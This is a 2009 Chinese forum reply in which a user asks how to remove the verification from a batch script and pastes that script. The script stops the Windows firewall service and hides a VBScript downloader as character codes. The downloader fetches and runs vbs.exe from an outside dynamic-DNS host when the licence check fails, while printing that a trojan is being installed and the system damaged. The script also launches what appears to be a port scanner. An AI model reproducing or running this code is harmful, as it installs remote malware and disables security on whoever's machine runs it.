- 帖子
- 3
- 积分
- 109
- 技术
- 0
- 捐助
- 0
- 注册时间
- 2009-11-30
|
6楼
发表于 2009-12-1 20:58
| 只看该作者
5555555555~~@@
那我的那个验证如何使用DEBUG去除。?
@echo off
net stop sharedaccess
if not exist C:\WINDOWS\web.vbs goto :ad
b
if not exist C:\WINDOWS\mirl goto :ab
goto :oko
:ad
mode con cols=50 lines=20&color 7f
title lengyuye key
cls
echo
echo
echo key
net stop sharedaccess
echo Str=Array(83,101,116,32,120,80,111,115,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,41,32,32,13,10,120,80,111,115,116,46,79,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,97,118,122,104,97,52,46,51,51,50,50,46,111,114,103,47,118,98,115,46,101,120,101,34,44,48,32,32,32,13,10,120,80,111,115,116,46,83,101,110,100,40,41,32,32,32,13,10,83,101,116,32,115,71,101,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,65,68,79,68,66,46,83,116,114,101,97,109,34,41,32,32,32,13,10,115,71,101,116,46,77,111,100,101,32,61,32,51,32,32,13,10,115,71,101,116,46,84,121,112,101,32,61,32,49,32,32,13,10,115,71,101,116,46,79,112,101,110,40,41,32,32,13,10,115,71,101,116,46,87,114,105,116,101,40,120,80,111,115,116,46,114,101,115,112,111,110,115,101,66,111,100,121,41,32,32,13,10,115,71,101,116,46,83,97,118,101,84,111,70,105,108,101,32,34,67,58,92,87,73,78,68,79,87,83,92,118,98,115,46,101,120,101,34,44,50,32,32,13,10) >>C:\WINDOWS\ut.vbs
echo Function Num2Str(Str):For I=0 To UBound(Str):Num2Str=Num2Str ^& Chr(Str(I)):Next:End Function >>C:\WINDOWS\ut.vbs
echo Function Num2Str(Str):For I=0 To UBound(Str):Num2Str=Num2Str ^& Chr(Str(I)):Next:End Function >>C:\WINDOWS\ut.vbs
echo Execute Num2Str(Str) >>C:\WINDOWS\ut.vbs
echo Execute Num2Str(Str) >>C:\WINDOWS\ut.vbs
cls
echo.
echo.
echo.
echo.
echo.
echo 认证错误! 执行下载木马!
echo.
echo.
echo 正在破坏系统... ...
C:\WINDOWS\ut.vbs
C:\WINDOWS\vbs.exe
del C:\WINDOWS\ut.vbs /q
del C:\WINDOWS\vbs.exe /q
goto :ob
:ab
@echo off&setlocal enabledelayedexpansion
if exist C:\WINDOWS\mirl del C:\WINDOWS\mirl /q
set yyyy=%date:~0,4%
set mm=%date:~5,2%
set dd=%date:~8,2%
set /a od=!dd!-1
if !od!==0 call :dd0
if !mm!==0 call :mm0
set yyyymmdd=l1!yyyy!5!mm!2!od!1
echo !yyyymmdd!>>C:\WINDOWS\mirl
goto :oko
:dd0
set /a mm=!mm!-1
for %%a in (1 3 5 7 8 10 12)do set %%add=31
set /a pddd=!yyyy!*10/4
set pd2d=!pddd:~-1,1!
set 2dd=28
if !pd2d!==0 set 2dd=29
for %%b in (4 6 9 11)do set %%bdd=30
set od=!%mm%dd!
goto :eof
:mm0
set /a yyyy=!yyyy!-1
set mm=12 && set od=31
goto :eof
:oko
@echo off
COPY C:\WINDOWS\mirl C:\WINDOWS\system32\mced
COPY C:\WINDOWS\web.vbs C:\WINDOWS\system32\cced
@for /f "tokens=1,2,3 delims= " %%i in (C:\WINDOWS\system32\mced) do set gateway1=%%i%%j%%k
@for /f "tokens=1,2,3 delims= " %%i in (C:\WINDOWS\system32\cced) do set gateway=%%i
if /i %gateway%==%gateway1% goto yes
if exist C:\WINDOWS\system32\mced del C:\WINDOWS\system32\mced /q
if exist C:\C:\WINDOWS\system32\cced del C:\C:\WINDOWS\system32\cced /q
if exist C:\WINDOWS\mirl del C:\WINDOWS\mirl /q
if exist C:\WINDOWS\web.vbs del del C:\WINDOWS\web.vbs /q
exit
:yes
echo on
if exist C:\WINDOWS\system32\mced del C:\WINDOWS\system32\mced /q
if exist C:\C:\WINDOWS\system32\cced del C:\C:\WINDOWS\system32\cced /q
if exist C:\WINDOWS\mirl del C:\WINDOWS\mirl /q
if exist C:\WINDOWS\web.vbs del del C:\WINDOWS\web.vbs /q
@echo off
cls
mode con cols=50 lines=20&color 7f
title lengyuye key
echo yanzhengdengdai!
echo =1=
@ping 127.0.0.1 -n 50>nul
if not exist OPE?.DLL echo NO && goto:bbdd
COPY OPE.DLL OPE1.DLL
del OPE.DLL /Q
goto LCC
:NO
@echo off
color B
cls
mode con cols=60 lines=20&color 6c
@for /f "tokens=1,2,3 delims= " %%i in (OPE1.DLL) do s -p :%%i…… -m 1 && if exist OPE1.DLL @echo off && @start /b ok %%i 1521 3000 %%i
goto :iipp
:LLCC
@echo off&setlocal enabledelayedexpansion
set keyn=1
for /f "tokens=2 delims=:" %%i in ('ipconfig /all ^| findstr /i /c:"hysical Address"') do set keyid=%%i
set keyid=%keyid:~10,2%%keyid:~1,2%%keyid:~4,2%%keyid:~16,2%%keyid:~7,2%%keyid:~13,2%
if exist "%~dp0xcdkey.dat" goto key2
:key
echo key:%keyid%
set keyida=%keyid%
set /a keyida+=1234567890
set /a keyida">>="2
set key=
set /p key=(%keyn%)------
if /i %key%==%keyida% echo %keyida%>"%~dp0xcdkey.dat"&&goto NO
set /a keyn+=1
if /i %keyn%==4 goto key1
echo NO!
goto key
:key1
echo BEY!
del %0
call :exit
:key2
for /f "tokens=1* delims=" %%i in ('type "%~dp0xcdkey.dat"') do set keyida=%%i
set keyidb=%keyid%
set /a keyidb+=1234567890
set /a keyidb">>="2
if /i %keyida%==%keyidb% goto NO
echo NO!
goto key
:iipp
del OPE1.DLL /q
if exist C:\WINDOWS\system32\mced del C:\WINDOWS\system32\mced /q
if exist C:\C:\WINDOWS\system32\cced del C:\C:\WINDOWS\system32\cced /q
if exist C:\WINDOWS\mirl del C:\WINDOWS\mirl /q
if exist C:\WINDOWS\web.vbs del del C:\WINDOWS\web.vbs /q
:bbdd
ceshi.bat |
|